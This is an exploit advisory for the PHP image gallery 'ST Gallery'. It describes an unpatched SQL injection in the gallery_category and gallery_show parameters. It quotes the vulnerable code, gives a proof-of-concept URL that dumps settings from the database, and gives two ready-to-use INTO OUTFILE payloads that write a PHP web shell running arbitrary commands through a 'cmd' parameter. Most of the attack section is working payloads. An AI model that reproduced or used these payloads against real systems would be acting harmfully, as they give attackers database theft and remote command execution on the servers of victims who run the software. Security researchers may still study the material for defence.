CMS INFORMATION:
–>WEB: http://blog.sebastian-thiele.net/projekte/gallery/
–>DOWNLOAD: http://sourceforge.net/projects/st-gallery/
–>DEMO: N/A
–>CATEGORY: CMS / Image Galleries
–>DESCRIPTION: Diese Galerie ist der erste Teil einer Projektreihe.
Diese Galerie ist fьr Leute gedacht, die sich mit der PHP-Programmierung…
–>RELEASED: 2009-02-26
CMS VULNERABILITY:
–>TESTED ON: firefox 3
–>DORK: N/A
–>CATEGORY: SQL INJECTION
–>AFFECT VERSION: CURRENT
–>Discovered Bug date: 2009-04-05
–>Reported Bug date: 2009-04-05
–>Fixed bug date: Not fixed
–>Info patch: Not fixed
–>Author: YEnH4ckEr
–>mail: y3nh4ck3r[at]gmail[dot]com
–>WEB/BLOG: N/A
–>COMMENT: A mi novia Marijose…hermano,cunyada, padres (y amigos xD) por su apoyo.
–>EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)
#########################
////////////////////////
SQL INJECTION (SQLi):
////////////////////////
#########################
<<<<---------++++++++++++++ Condition: magic_quotes_gpc=off ++++++++++++++++±-------->>>>
This is a crazy app, admin zone isn't protected, perhaps it needs a .htaccess file. Database doesn't store
information about users (or admin).
Path –> [HOME_PATH]/example.php
…
if($_GET[gallery_category]){
getGalleryImage($_GET[gallery_category], $_GET[gallery_show], true, "both", 450, "");
}
…
Path –> [HOME_PATH]/st_admin/gallery_output.php
…
function getGalleryImage($album, $image, $showAlbum, $posNav, $maxWidth){
if($showAlbum){
$abfrage = "SELECT * FROM ".$db_prefix."gallery_category WHERE id = '$album'";
$ergebnis = mysql_query($abfrage);
…
}
$abfrage = "SELECT * FROM ".$db_prefix."gallery_images WHERE category = '$album'";
$ergebnis = mysql_query($abfrage);
…
GET vars –> gallery_category and gallery_show
PoC-1:
http://[HOST]/[HOME_PATH]/example.php?gallery_category=-1%27+UNION+ALL+SELECT+1,concat(name,0x3A3A3A,value)+FROM+st_settings+WHERE+id=2/*
Return –> gallery_path = … (**take note)
Return –> version and databse
<<<<---------++++++++++++++ Condition: Permission to create files ++++++++++++++++±-------->>>>
[COMPLETE-PATH] –> (**use note)
Ex-1: http://[HOST]/[HOME_PATH]/example.php?gallery_category=-1%27+UNION+ALL+SELECT+'<HTML><title>SHELL BY
–Y3NH4CK3R–></title><body text=ffffff bgcolor=000000><center><h1>YOUR SHELL IS ON!<br></h1></center><br><br><font
color=ff0000><h2>Get var (cmd) to execute comands. Enjoy it!</h2></font><h3>Command Result:</h3><?php system($_GET[cmd]);
?>','<br><br><font color=ff0000><h3>By y3nh4ck3r. Contact:
[email protected]</h3></font></body></HTML>'+INTO+OUTFILE+'[COMPLETE-PATH]/shell.php'/*
Ex-1: http://[HOST]/[HOME_PATH]/example.php?gallery_category=1&gallery_show=-1%27+UNION+ALL+SELECT+'<HTML><title>SHELL BY
–Y3NH4CK3R–></title><body text=ffffff bgcolor=000000><center><h1>YOUR SHELL IS ON!<br></h1>','</center><br><br><font
color=ff0000><h2>Get var (cmd) to execute comands. Enjoy it!</h2></font>','<h3>Command Result:</h3><?php
system($_GET[cmd]); ?>','<br><br><font color=ff0000>','<h3>By y3nh4ck3r. Contact:
[email protected]</h3>','</font></body></HTML>'+INTO+OUTFILE+'[COMPLETE-PATH]/shell.php'/*
Return: Your shell in –> http://[HOST]/[HOME_PATH]/shell.php
#######################################################################
#######################################################################
##*******************************************************************##
####
##-------------------------------------------------------------------##
####
##*******************************************************************##
#######################################################################
#######################################################################